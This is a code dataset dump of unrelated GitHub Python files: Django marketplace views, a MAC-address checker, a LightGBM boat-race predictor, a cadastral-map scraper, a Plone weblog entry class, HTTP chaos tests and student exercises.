\"dtype_to_gl_iformat\",\n \"gl_iformat_to_dtype\",\n \"dtype_to_gl_format\",\n \"gl_format_to_dtype\",\n \"gl_iformat_to_gl_type\",\n \"texture_compare_funcs\",\n \"texture_compare_modes\",\n \"texture_min_filters\",\n \"texture_mag_filters\",\n \"texture_swizzles\",\n \"texture_wrapmodes\",\n \"primitive_types\",\n \"buffer_usages\",\n \"buffer_dimensions_to_primitive\",\n \"primitive_to_buffer_dimensions\",\n \"blend_functions\",\n \"blend_equations\",\n \"depth_functions\",\n \"draw_buffers\",\n \"hints\",\n \"provoking_vertices\",\n \"logic_op_modes\",\n \"provoke_modes\",\n \"color_read_formats\",\n \"color_read_types\",\n \"read_buffers\",\n \"transform_feedback_buffer_modes\",\n \"client_wait_sync_returns\",\n \"framebuffer_status\",\n \"cull_face_modes\",\n \"front_face_modes\",\n \"polygon_modes\",\n]\n\n","repo_name":"swenger/glitter","sub_path":"glitter/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"32434116861","text":"from django.shortcuts import render, redirect\nfrom .forms import ExtendedUserForm, ItemForm, NewUserCreationForm, forms\nfrom .models import ExtendedUser, Item\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib import messages\n\n# Create your views here.\n\n\ndef home_view(request):\n return render(request, 'userHomePage.html', {'messages': messages.get_messages(request)})\n\n\ndef user_register(request):\n if request.method == 'POST':\n form_extended = ExtendedUserForm(request.POST)\n form_user = NewUserCreationForm(request.POST)\n if form_extended.is_valid() and form_user.is_valid():\n form_user.save() # Creates the user\n username = form_user.cleaned_data['username']\n user = User.objects.get(username=username) # Gets the user so that the extended user can be made\n e_user = ExtendedUser.objects.create(user=user, test=form_extended.cleaned_data['test'])\n login(request, user) # Login user\n messages.success(request, 'Account created and Logged in')\n return redirect('user_home')\n else:\n form_extended = ExtendedUserForm()\n form_user = NewUserCreationForm()\n return render(request, 'userForm.html',\n {'extendedUser_form': form_extended, 'user_form': form_user})\n\n\ndef create_item(request):\n if not request.user.is_authenticated:\n messages.error(request, 'You need to be logged in to create an item')\n return redirect('user_home')\n\n if request.method == 'POST':\n form = ItemForm(request.POST)\n if form.is_valid():\n user = ExtendedUser.objects.get(user=request.user)\n price = form.cleaned_data['price']\n title = form.cleaned_data['title']\n description = form.cleaned_data['title']\n Item.objects.create(user=user, price=price, title=title, description=description)\n\n messages.success(request, 'Item created')\n return redirect('user_home')\n else:\n form = ItemForm()\n return render(request, 'itemForm.html', {'item_form': form})\n\n\ndef user_logout(request):\n if not request.user.is_authenticated:\n messages.error(request, 'You are not logged')\n return redirect('user_home')\n\n logout(request)\n messages.success(request, 'Logged out')\n return redirect('user_home')\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n 
            messages.success(request, 'Logged In')\n            return redirect('user_home')\n    else:\n        form = AuthenticationForm()\n    return render(request, 'loginPage.html', {'login_form': form})\n","repo_name":"HassM07/MarketPlace","sub_path":"extendedUser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27611124399","text":"#!/bin/env python\r\n\r\n\r\nimport re, subprocess\r\n\r\n\r\nmac_of_card = ''\r\nmac_of_user = ''\r\nnext_mac = ''\r\n\r\n\r\ndef user_mac_input(mac_user, offset):\r\n    add_offset = int(mac_user.replace(':', ''), 16) + offset  # turns the mac into an int and adds the offset\r\n    global next_mac\r\n    next_mac = \":\".join(re.findall(\"..\", \"%012x\"%add_offset))  # returns the next mac\r\n    global mac_of_user\r\n    mac_of_user = mac_user\r\n\r\n\r\ndef find_mac_of_card(bus_num, ven_id):\r\n    bus = list(subprocess.check_output(\"lspci -n |grep \" + f'{ven_id}'+ \" |awk {'print $1'} \", shell=True).decode().splitlines())\r\n    portname = subprocess.check_output(\"lshw -businfo |grep \" + bus[bus_num] + \" |awk '{print $2}'\", shell=True).decode().strip()\r\n    with open(\"/sys/class/net/\" + f'{portname}' + \"/address\") as f:\r\n        global mac_of_card\r\n        mac_of_card = f.read().strip().upper()\r\n\r\n\r\ndef mac_compare(ven_id_input, mac_user_input):\r\n    portamount = subprocess.check_output(\"lspci -n |grep \" + f'{ven_id_input}' + \"| wc -l \", shell=True)\r\n    find_mac_of_card(bus_num=0, ven_id=ven_id_input)\r\n    mac_of_card_int = mac_of_card.replace(\":\", \"\")\r\n    test = ''\r\n    check = 'MAC Addresses of card: \\n'\r\n    if re.match(mac_user_input, mac_of_card_int, re.I):\r\n        for x in range(0, int(portamount)):\r\n            user_mac_input(mac_user=mac_user_input, offset=x)\r\n            find_mac_of_card(bus_num=x, ven_id=ven_id_input)\r\n            if re.match(next_mac, mac_of_card, re.I):\r\n                test = \"PASS MAC\"\r\n            else:\r\n                test = \"FAIL MAC\"\r\n            check = check + mac_of_card + \" \\n\"\r\n        print(test)\r\n        return check\r\n    else:\r\n        mac_not_match = \"MAC of user does not match first MAC of card\"\r\n        print(mac_not_match)\r\n        return mac_not_match\r\n\r\n\r\nif __name__ == '__main__':\r\n    # mac_compare() needs a vendor id and a starting MAC to compare against,\r\n    # e.g. mac_compare('8086', '001B44113AB7')\r\n    pass\r\n","repo_name":"MatanB99/ft_menu","sub_path":"FT_MENU/MAC_CHECK.py","file_name":"MAC_CHECK.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"14692778506","text":"# Make predictions based on the data.\nimport pandas as pd\nimport pickle\nimport lightgbm as lgb\n\ndef predict(df, stage):\n    list_std = ['艇番', '全国2連率', '全国勝率', '当地勝率', '当地2連率', 'モータ2連率', 'ボード2連率', '級','展示タイム', 'スタート展示', '天気', 'レーサ番号']\n    result_std = ['順位']\n    odds_std = ['オッズ']\n    stage = str(stage)\n    one_params_rate = {'01': 1.71, '02': 1.83, '03': 1.47, '04': 1.93, '05': 1.80, '06': 1.66, '07': 1.86, '08': 0, '09': 0, '10': 0, '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': -1, '19': 1.76, '20': 0, '21': 1.59, '22': 1.92, '23': 1.9, '24': -1}\n    sub_params_rate = {'01': 1.95, '02': 1.92, '03': 1.88, '04': 1.84, '05': 1.75, '06': 1.84, '07': 1.86, '08': 0, '09': 0, '10': 0, '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': 1.93, '19': 1.79, '20': 0, '21': 1.75, '22': 1.94, '23': 1.9, '24': 1.61}\n    # Previously the data was not stored in binary files, so it was set up here; now those files exist, so just load them.\n    # Note that the LightGBM values differ per venue, so change them accordingly. Same for the odds (keeping a list here and plugging it in should work).\n    data = []\n    x_text = '../../binaryfile/x_train_' + stage.zfill(2) + '.binaryfile'\n
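    # paths are assumed relative to this module; a missing pickle raises FileNotFoundError below\n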
    y_train = '../../binaryfile/y_train_' + stage.zfill(2) + '.binaryfile'\n\n    with open(x_text, 'rb') as web:\n        x_train = pickle.load(web)\n\n    with open(y_train, 'rb') as web:\n        y_train = pickle.load(web)\n\n    # An error occurs here when the files do not exist - this still needs fixing.\n\n    one_rate = one_params_rate[stage.zfill(2)]\n    sub_rate = sub_params_rate[stage.zfill(2)]\n    lgb_train = lgb.Dataset(x_train, y_train)\n    # dataset\n    # If there is no data, the returned list stays empty.\n    if one_rate > 0:\n        params = {'task': 'train',\n                  'boosting_type': 'gbdt',\n                  # 'objective': 'lambdarank',  # <- this is where ranking learning would be specified!\n                  # 'metric': 'ndcg',  # for lambdarank\n                  'ndcg_eval_at': [1,2,3,4,5,6],  # we want to predict the trifecta\n                  'max_position': 6,  # boat races only have 6 places\n                  'learning_rate': one_rate,\n                  # 'min_data': 1,\n                  # 'min_data_in_bin': 1,\n                  }\n        # training\n        gbm = lgb.train(params, lgb_train)\n\n        # prediction\n        y_pred = gbm.predict(df)\n\n        rank = [0, 0, 0, 0, 0, 0]\n        #[2.1, 1.9, 1.3, 4.1, 3.0, 5.0]\n        for i, n in enumerate(sorted(y_pred)):  # re-sort in ascending order\n            for j, m in enumerate(y_pred):\n                if n == m:\n                    rank[j] = i + 1\n\n        #[3, 2, 1, 5, 4, 6]\n\n        r_3 = []\n        for i, number in enumerate(rank):\n            if number == 1:\n                r_3.append(i+1)\n\n        r_3.append(5)\n\n        data.append(r_3)\n\n    # place bet\n    if sub_rate > 0:\n        params = {'task': 'train',\n                  'boosting_type': 'gbdt',\n                  # 'objective': 'lambdarank',  # <- this is where ranking learning would be specified!\n                  # 'metric': 'ndcg',  # for lambdarank\n                  'ndcg_eval_at': [1,2,3,4,5,6],  # we want to predict the trifecta\n                  'max_position': 6,  # boat races only have 6 places\n                  'learning_rate': sub_rate,\n                  # 'min_data': 1,\n                  # 'min_data_in_bin': 1,\n                  }\n        # training\n        gbm = lgb.train(params, lgb_train)\n\n        # prediction\n        y_pred = gbm.predict(df)\n\n        rank = [0, 0, 0, 0, 0, 0]\n        #[2.1, 1.9, 1.3, 4.1, 3.0, 5.0]\n        for i, n in enumerate(sorted(y_pred)):  # re-sort in ascending order\n            for j, m in enumerate(y_pred):\n                if n == m:\n                    rank[j] = i + 1\n\n        r_3 = []\n        for i, number in enumerate(rank):\n            if number == 1:\n                r_3.append(i+1)\n\n        r_3.append(6)\n\n        data.append(r_3)\n\n    # data = [1,5,3,6]\n    # the 5 and 6 at positions 2 and 4 of the array indicate the bet type (win, place, etc.)\n\n    return data\n\n\n\n","repo_name":"JunJon09/Boat_race","sub_path":"myproject/auto_buy/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37159817305","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass linear_n_dpeth(nn.Module):\r\n    '''\r\n    Linear Network\r\n    '''\r\n    def __init__(self, layers_width):\r\n        super().__init__()\r\n\r\n        self.layers = nn.ModuleList([])\r\n        for (i, layer_width) in enumerate(layers_width[0:-1]):\r\n            next_layer_width = layers_width[i+1]\r\n            self.layers.append(nn.Linear(layer_width, next_layer_width, bias=False))\r\n            torch.nn.init.normal_(self.layers[i].weight, mean=0.0, std=0.01)\r\n\r\n    def forward(self, x):\r\n        output = x\r\n        for layer in self.layers:\r\n            output = layer(output)\r\n\r\n        return output","repo_name":"idanbasre/Overparameterization","sub_path":"trainer/LinearNDepthNet.py","file_name":"LinearNDepthNet.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"8395198171","text":"# Design a class to calculate the median of a number stream. The class should have the following two methods:\n\n# insertNum(int num): stores the number in the class\n# findMedian(): returns the median of all numbers inserted in the class\n\n# If the count of numbers inserted in the class is even, the median will be the average of the middle two numbers.\n\n# Example 1:\n\n# 1. insertNum(3)\n# 2. insertNum(1)\n# 3. findMedian() -> output: 2\n
# 4. insertNum(5)\n# 5. findMedian() -> output: 3\n# 6. insertNum(4)\nfrom heapq import *\n\nclass MedianOfAStream:\n\n    def __init__(self):\n        self.small, self.large = [], []\n\n    def insert_num(self, num):\n        \n        heappush(self.small, -num)\n\n        if self.small and self.large and -(self.small[0]) > self.large[0]:\n            heappush(self.large, -heappop(self.small))\n\n        if len(self.small) - len(self.large) > 1:\n            heappush(self.large, -heappop(self.small))\n        \n        if len(self.large) - len(self.small) > 1:\n            heappush(self.small, -heappop(self.large))\n\n        print(self.small, self.large)\n\n    def find_median(self):\n\n        if len(self.small) > len(self.large):\n            return -self.small[0]\n        elif len(self.large) > len(self.small):\n            return self.large[0]\n        else:\n            return (-self.small[0] + self.large[0]) / 2\n\n\ndef main():\n    medianOfAStream = MedianOfAStream()\n    medianOfAStream.insert_num(3)\n    medianOfAStream.insert_num(1)\n    print(\"The median is: \" + str(medianOfAStream.find_median()))\n    medianOfAStream.insert_num(5)\n    print(\"The median is: \" + str(medianOfAStream.find_median()))\n    medianOfAStream.insert_num(4)\n    print(\"The median is: \" + str(medianOfAStream.find_median()))\n\n\nmain()\n    ","repo_name":"ashutosh-874/InterviewPrep","sub_path":"9. Two Heaps/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"42901450148","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 13 00:05:09 2020\r\n\r\n@author: denis\r\n\"\"\"\r\n\r\nimport schedule\r\nimport time\r\nimport requests\r\n\r\nimport asyncio\r\nimport get_object_data\r\n\r\nheaders = {\r\n    'Content-Type':'application/json; charset=utf-8',\r\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',\r\n}\r\n\r\nout_path = 'C:\\\\Users\\\\denis\\\\python\\\\hack_pkk\\\\presentaton\\\\kadast\\\\object\\\\'\r\n\r\n\r\nclass parser:\r\n    \r\n    def __init__(self, type_id = 1, sqot = 1, limit = 10):\r\n        self.type_id = type_id\r\n        self.sqo = ''\r\n        self.text = ''\r\n        self.sqot = sqot\r\n        self.limit = limit \r\n        #self.skip = self.limit\r\n        self.offset = 0\r\n        self.buffer = []\r\n        self.errors = []\r\n        self.file = []\r\n        self.headers = {\r\n            'Content-Type':'application/json; charset=utf-8',\r\n            'User-Agent':'Mozilla/1.0 (Windows 1.0; Win4; x4; rv:2.0) Gecko/201 Firefox/2.0',\r\n        }\r\n\r\n    def ParseUrl_sqo(self, sqo, skip):\r\n\r\n        self.sqo = sqo\r\n        self.skip = skip\r\n        \r\n        for sqo_i in self.sqo:\r\n            status_code = 0\r\n\r\n            try:\r\n                while status_code != 200:\r\n                    #print ('Object: ' + str(sqo_i) + ', offset: ' + str(self.offset))\r\n                    r = requests.get('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?sqo=' + str(sqo_i) + '&sqot='+ str(self.sqot) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip), headers=headers, timeout=(60, 60))\r\n                    status_code = r.status_code\r\n                    time.sleep(1)\r\n                if len(r.json()['features']) != 0:\r\n                    for elem in r.json()['features']:\r\n                        self.buffer.append(elem)\r\n                        self.offset += 1\r\n                    if self.skip + self.limit > 200:\r\n                        break\r\n                    self.ParseUrl_sqo(self.sqo, self.skip + self.limit)\r\n            except:\r\n                self.errors.append('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?sqo=' + str(sqo_i) + '&sqot='+ str(self.sqot) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip)) \r\n\r\n    def ParseUrl_text(self, text, skip):\r\n\r\n        self.text = text\r\n        self.skip = skip\r\n        \r\n        for text_i in self.text:\r\n            status_code = 0\r\n\r\n            try:\r\n
                while status_code != 200:\r\n                    print ('Object: ' + str(text_i) + ', offset: ' + str(self.offset))\r\n                    r = requests.get('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip), headers=headers, timeout=(60, 60))\r\n                    #print ('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip))\r\n                    status_code = r.status_code\r\n                    time.sleep(1)\r\n                if len(r.json()['features']) != 0:\r\n                    for elem in r.json()['features']:\r\n                        self.buffer.append(elem)\r\n                        self.offset += 1\r\n                    if self.skip + self.limit > 9:\r\n                        break\r\n                    self.ParseUrl_text(self.text, self.skip + self.limit)\r\n            except:\r\n                self.errors.append('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip))\r\n\r\n    def output(self):\r\n        print (self.buffer)\r\n\r\n    def output_h(self):\r\n        return self.buffer\r\n\r\n    def save_buffer(self, path, file_name):\r\n        \r\n        id_fields = [x['attrs']['id'] + '\\n' for x in self.buffer]\r\n        with open(path + file_name, 'w') as file:\r\n            file.writelines(id_fields)\r\n\r\ndef t():\r\n    print(\"+\")\r\n\r\n    \r\n    \r\ndef get_new_objects():\r\n    \r\n    # get the list of districts\r\n    r_get = parser(3, 4, 10)\r\n    r_get.ParseUrl_text(['59:*'], 0)\r\n    raions = [x['attrs']['id'] for x in r_get.output_h()]\r\n    \r\n    # get the list of cadastral quarters\r\n    kvartals = []\r\n    for raion in raions:\r\n        k_get = parser(2, 1, 10)\r\n        k_get.ParseUrl_text([ raion +':*'], 0)\r\n        for x in k_get.output_h():\r\n            kvartals.append(x['attrs']['id']) \r\n\r\n    # get the list of parcels\r\n    feilds = []\r\n    for kvartal in kvartals[:5]:\r\n        f_get = parser(1, 1, 10)\r\n        f_get.ParseUrl_text([ kvartal +':*'], 0)\r\n        for x in f_get.output_h():\r\n            feilds.append(x['attrs']['id'])\r\n\r\n#    intermediate save\r\n#    with open( out_path + 'objects.txt', 'w') as file:\r\n#        file.write(\"\\n\".join(feilds))\r\n\r\n\r\n#   save the data for each parcel\r\n    loop = asyncio.get_event_loop() \r\n    loop.create_task(get_object_data._main(feilds))\r\n\r\n\r\nif __name__ == '__main__':\r\n#    #schedule.every().monday.do(get_new_objects)\r\n#    while True:\r\n#        schedule.run_pending()\r\n#        time.sleep(1)\r\n    \r\n    get_new_objects()\r\n    ","repo_name":"darkzenon/mirs_pk","sub_path":"pkk_get_kadastr.py","file_name":"pkk_get_kadastr.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30986345320","text":"from zope.interface import implements\nfrom AccessControl import ClassSecurityInfo\nfrom DateTime.DateTime import DateTime\n\n# Plone imports\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFCore.WorkflowCore import WorkflowException\nfrom Products.CMFPlone.utils import log\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\n\n# Archetypes imports\nfrom Products.Archetypes.public import BaseSchema\nfrom Products.Archetypes.public import Schema\nfrom Products.Archetypes.public import TextField\nfrom Products.Archetypes.public import TextAreaWidget\nfrom Products.Archetypes.public import RichWidget\nfrom Products.Archetypes.public import BaseContent\nfrom Products.Archetypes.public import registerType\nfrom Products.Archetypes.Marshall import RFC822Marshaller\n\n# Quills imports\nfrom Products.Quills import QuillsMessageFactory as _\n
from quills.core.interfaces import IWorkflowedWeblogEntry\nfrom quills.app.topic import Topic\nfrom quills.app.topic import AuthorTopic\nfrom quills.app.utilities import QuillsMixin\nfrom quills.app.interfaces import IWeblogEnhancedConfiguration\n\n# Local imports\nfrom config import PROJECTNAME\nimport permissions as perms\n\nWeblogEntrySchema = BaseSchema.copy() + Schema((\n\n    TextField('description',\n        searchable=1,\n        accessor='Description',\n        widget=TextAreaWidget(\n            label=_(u'label_weblogentry_description', default=u'Excerpt'),\n            description=_(u'help_weblogentry_description', default='A brief introduction for this entry.'),\n            ),\n        ),\n\n    TextField('text',\n        searchable=1,\n        default_output_type='text/x-html-safe',\n        widget=RichWidget(\n            label=_(u'label_text', default=u'Entry Text'),\n            rows=30,\n            ),\n        ),\n    ),\n    marshall=RFC822Marshaller(),\n)\n\n# Move the subject/topic picking to the main edit view as it should be used\n# for every edit, really.\nWeblogEntrySchema['subject'].schemata = 'default'\n# The subject is not language-specific\nWeblogEntrySchema['subject'].languageIndependent = True\n# Make sure it is presented after the main text entry field.\nWeblogEntrySchema.moveField('subject', after='text')\n# Make sure the allowDiscussion field's default is None\nWeblogEntrySchema['allowDiscussion'].default = None\n# Put the discussion setting on the main page...\nWeblogEntrySchema['allowDiscussion'].schemata = 'default'\n# ... at the bottom, after the subject keywords.\nWeblogEntrySchema.moveField('allowDiscussion', after='subject')\n\n\nclass WeblogEntry(QuillsMixin, BaseContent, BrowserDefaultMixin):\n    \"\"\"Basic Weblog Entry.\n\n    >>> from zope.interface.verify import verifyClass\n    >>> verifyClass(IWorkflowedWeblogEntry, WeblogEntry)\n    True\n    \"\"\"\n\n    implements(IWorkflowedWeblogEntry)\n\n    schema = WeblogEntrySchema\n    _at_rename_after_creation = True\n\n    security = ClassSecurityInfo()\n\n    security.declareProtected(perms.View, 'getTitle')\n    def getTitle(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        return self.Title()\n\n    security.declareProtected(perms.View, 'getTopics')\n    def getTopics(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        weblog = self.getWeblog()\n        keywords = self.Subject()\n        return [Topic(kw).__of__(weblog) for kw in keywords]\n\n    security.declareProtected(perms.View, 'getAuthors')\n    def getAuthors(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        weblog = self.getWeblog()\n        creators = self.Creators()\n        return [AuthorTopic(creator).__of__(weblog) for creator in creators]\n\n    security.declareProtected(perms.View, 'getExcerpt')\n    def getExcerpt(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        # This is just an alias for Description in this case.\n        return self.Description()\n\n    security.declareProtected(perms.EditContent, 'setExcerpt')\n    def setExcerpt(self, excerpt):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        self.setDescription(excerpt)\n\n    security.declareProtected(perms.EditContent, 'setTopics')\n    def setTopics(self, topic_ids):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        self.setSubject(topic_ids)\n\n    def setText(self, text, mimetype=None):\n        \"\"\"Set the body text, using the entry's current mimetype by default.\"\"\"\n        # if no mimetype was specified, we use the default\n        if mimetype is None:\n            mimetype = self.getMimeType()\n        if hasattr(self, 'text'):\n            self.text.update(text, self, mimetype=mimetype)\n        else:\n            field = self.getField('text')\n            field.set(self, text, mimetype=mimetype)\n\n    security.declareProtected(perms.EditContent, 'edit')\n    def edit(self, title, excerpt, text, topics, mimetype=None):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n
        # if no mimetype was specified, we use the default\n        if mimetype is None:\n            mimetype = self.getMimeType()\n        self.setText(text, mimetype=mimetype)\n        self.setTitle(title)\n        self.setExcerpt(excerpt)\n        if topics:\n            self.setTopics(topics)\n        else:\n            self.setTopics([])\n        self.reindexObject()\n\n    security.declareProtected(perms.View, 'effective')\n    def effective(self):\n        \"\"\"Answer the date this entry became visible (published), or the\n        creation date if the former is not defined.\n\n        This is essentially a hotfix because Quills expects the effective\n        date always to be defined, which is not the case (see Quills\n        issue #126).\n\n        This is what fatsyndication feedentry does also. But here we are\n        not redefining getEffectiveDate because \"effective\" will be used\n        for cataloging.\n        \"\"\"\n        return self.getField('effectiveDate').get(self) or self.created()\n\n    security.declareProtected(perms.View, 'getPublicationDate')\n    def getPublicationDate(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        return self.getEffectiveDate()\n\n    security.declareProtected(perms.View, 'getMimeType')\n    def getMimeType(self):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        # (ATCT handles the mechanics for determining the default for us)\n        return self.text.getContentType()\n\n    security.declareProtected(perms.EditContent, 'setPublicationDate')\n    def setPublicationDate(self, datetime):\n        \"\"\"See IWeblogEntry.\n        \"\"\"\n        self.setEffectiveDate(datetime)\n\n    security.declareProtected(perms.EditContent, 'publish')\n    def publish(self, pubdate=None):\n        \"\"\"See IWorkflowedWeblogEntry.\n        \"\"\"\n        if self.isPublished():\n            # do nothing if the entry has already been published\n            return\n        # XXX Need to be able to handle std library datetime objects for pubdate\n        if pubdate is None:\n            pubdate = DateTime()\n        self.setPublicationDate(pubdate)\n        wf_tool = getToolByName(self, 'portal_workflow')\n        try:\n            wf_tool.doActionFor(self, 'publish')\n        except WorkflowException:\n            state = wf_tool.getInfoFor(self, 'review_state')\n            workflow = wf_tool.getWorkflowsFor(self)[0].id\n            objectPath = \"/\".join(self.getPhysicalPath())\n            log(\"WeblogEntry.publish failed, most probably because the current \"\n                \"state '%s' of workflow '%s' of entry '%s' does not define a \"\n                \"transition 'publish'. To solve this either use another workflow, \"\n                \"adapt the workflow, or refrain from using this method for now. \"\n                \"Sorry.\" % (state, workflow, objectPath))\n            raise\n        self.reindexObject()\n\n    security.declareProtected(perms.EditContent, 'retract')\n    def retract(self):\n        \"\"\"See IWorkflowedWeblogEntry.\n        \"\"\"\n        if not self.isPublished():\n            # do nothing if the entry has already been private\n            return\n        wf_tool = getToolByName(self, 'portal_workflow')\n        try:\n            wf_tool.doActionFor(self, 'retract')\n        except WorkflowException:\n            state = wf_tool.getInfoFor(self, 'review_state')\n            workflow = wf_tool.getWorkflowsFor(self)[0].id\n            objectPath = \"/\".join(self.getPhysicalPath())\n            log(\"WeblogEntry.retract failed, most probably because the current \"\n                \"state '%s' of workflow '%s' of entry '%s' does not define a \"\n                \"transition 'retract'. To solve this either use another workflow, \"\n                \"adapt the workflow, or refrain from using this method for now. 
\"\n \"Sorry.\" % (state, workflow, objectPath))\n raise\n self.setPublicationDate(None)\n self.reindexObject()\n\n security.declareProtected(perms.EditContent, 'isPublished')\n def isPublished(self):\n \"\"\"See IWorkflowedWeblogEntry.\n \"\"\"\n wf_tool = getToolByName(self, 'portal_workflow')\n review_state = wf_tool.getInfoFor(self, 'review_state')\n weblog_config = IWeblogEnhancedConfiguration(self.getWeblog())\n return review_state in weblog_config.published_states\n\n security.declareProtected(perms.View, 'getWeblogEntryContentObject')\n def getWeblogEntryContentObject(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n return self\n\n\nregisterType(WeblogEntry, PROJECTNAME)\n","repo_name":"collective/Products.Quills","sub_path":"Products/Quills/WeblogEntry.py","file_name":"WeblogEntry.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19823235367","text":"import pytest\n\n\n@pytest.fixture\ndef call(service_client, for_client_gate_port, gate):\n async def _call(htype='common', headers=None, **args):\n return await service_client.get(\n '/chaos/httpclient',\n params={'type': htype, 'port': str(for_client_gate_port), **args},\n headers=headers or {},\n )\n\n return _call\n\n\n@pytest.fixture\ndef ok_mock(mockserver):\n @mockserver.handler('/test')\n async def mock(_request):\n return mockserver.make_response('OK!')\n\n return mock\n\n\nasync def test_ok(call, ok_mock):\n response = await call()\n assert response.status == 200\n assert response.text == 'OK!'\n\n\nasync def test_stop_accepting(call, gate, ok_mock):\n response = await call()\n assert response.status == 200\n assert gate.connections_count() >= 1\n\n await gate.stop_accepting()\n await gate.sockets_close() # close keepalive connections\n assert gate.connections_count() == 0\n\n response = await call()\n assert response.status == 500\n assert gate.connections_count() == 0\n\n gate.start_accepting()\n\n response = await call()\n assert response.status == 200\n assert gate.connections_count() >= 1\n\n\nasync def test_close_after_headers(call, gate, mockserver):\n @mockserver.handler('/test')\n async def _mock(request):\n if on:\n await gate.sockets_close()\n return mockserver.make_response('OK!')\n\n on = True\n response = await call()\n assert response.status == 500\n\n on = False\n response = await call()\n assert response.status == 200\n\n\nasync def test_required_headers(call, gate, ok_mock):\n required_headers = ['X-YaRequestId', 'X-YaSpanId', 'X-YaTraceId']\n\n response = await call()\n assert response.status == 200\n assert all(key in response.headers for key in required_headers)\n\n await gate.stop_accepting()\n await gate.sockets_close() # close keepalive connections\n assert gate.connections_count() == 0\n\n response = await call()\n assert response.status == 500\n assert all(key in response.headers for key in required_headers)\n assert gate.connections_count() == 0\n","repo_name":"userver-framework/userver","sub_path":"core/functional_tests/basic_chaos/tests/httpclient/test_httpclient.py","file_name":"test_httpclient.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":2029,"dataset":"github-code","pt":"52"} +{"seq_id":"17924913217","text":"#Sara D'Alessandro\n#Homework #3\n\nimport random\n\n#PROBLEM 1:\nsum1 = 0\nfor i in range (101):\n sum1 = sum1 + i\n\nprint(sum1)\n\nsum2 = 0\nfor i in range (101):\n if i % 2 == 0:\n sum2 += i\n\nprint(sum2)\n\nsum3 = 0\nfor i 
in range (100):\n if i % 2 == 1:\n sum3 += i\n\nprint(sum3)\n\n\n\n#PROBLEM 2:\ndef dna_to_rna(x):\n \n base = [\"A\",\"C\",\"G\",\"T\"]\n rnabase = [\"U\",\"G\",\"C\",\"A\"]\n \n print(\"RNA sequence will be: \", end=\"\")\n\n for i in x:\n if i == 'A': \n print(rnabase[0], end=\"\")\n elif i == 'C':\n print(rnabase[1], end=\"\")\n elif i == 'G':\n print(rnabase[2], end=\"\")\n elif i == 'T':\n print(rnabase[3], end=\"\")\n else:\n pass\n\n cont()\n\ndef cont():\n\n cont = input(\"Enter another DNA sequence or enter 'X' to quit: \")\n if cont == 'X':\n print(\"Peace out my dude.\")\n else:\n dna_to_rna(cont)\n \nprint(\"Welcome to the DNA to RNA Nucleotide Converter-er.\") \ndna = input(\"Enter DNA sequence: \")\n\ndna_to_rna(dna)\n\n\n\n#PROBLEM 3:\n\nimport random\nimport math\n\nx1 = random.randint(0,30)\ny1 = random.randint(0,30)\n\ndef menu():\n\n\tx = 15\n\ty = 15\n\n\tprint(\"Welcome to the Hunt, you doomed, ill-fated soul.\")\n\tcommand = input(\"Enter a direction, such as 'N', 'S', 'E', 'W', or enter 'X' to flee (exit): \")\n\n\tif command in 'Nn':\n\t\ty = y + 1\n\t\tresult(x,y)\n\telif command in 'Ss':\n\t\ty = y - 1\n\t\tresult(x,y)\n\telif command in 'Ee':\n\t\tx = x + 1\n\t\tresult(x,y)\n\telif command in 'Ww':\n\t\tx = x - 